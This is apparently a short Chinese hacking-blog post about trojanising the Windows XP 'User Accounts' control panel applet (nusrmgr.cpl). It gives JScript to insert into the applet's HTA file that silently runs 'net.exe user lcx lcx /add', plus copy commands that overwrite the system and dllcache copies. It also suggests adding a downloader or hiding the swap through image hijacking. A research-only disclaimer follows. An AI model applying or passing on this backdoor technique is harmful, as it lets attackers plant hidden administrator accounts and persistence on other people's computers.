# 鬼仔:为了不让首页截断部分出现图片,因为把图片位置换了下,不知道lcx会不会介意。
作者:lcx
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。
看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)
我们在里边加几行js语句:
var WshShell = CreateObject("WScript.Shell") WshShell.Run("net.exe user lcx lcx /add", 0, true)当然你加下载者更好,我只是做个示例。
然后:
echo y|copy nusrmgr.cpl c:/windows/system32/dllcache/nusrmgr.cpl echo y|copy nusrmgr.cpl c:/windows/system32/nusrmgr.cpl替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。
这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论